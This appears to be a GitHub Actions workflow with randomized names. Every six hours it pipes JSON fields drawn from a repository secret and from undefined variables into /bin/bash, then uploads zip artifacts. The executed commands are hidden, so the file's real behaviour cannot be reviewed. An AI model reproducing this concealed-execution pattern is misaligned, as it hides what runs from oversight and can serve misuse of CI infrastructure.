name: zhengsonglianghe
on:
  workflow_dispatch:

  schedule:
    - cron: '33 0,6,12,18 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhengsonglianghe
        env:
          fb087: ${{ secrets.fb087 }}
        run: |
          printf '%s' "$fb087" | jq -r .lbbr4754 | /bin/bash
          echo $swwl2 | jq -r .cgz1970 | /bin/bash
          echo $o405 | jq -r .g1785 | /bin/bash
          printf '%s' "$vpeco7240" | jq -r .lck54 | /bin/bash
          echo $lfxo2328 | jq -r .oj9 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: p95eMAcV
          path: "*.zip"
          retention-days: 1
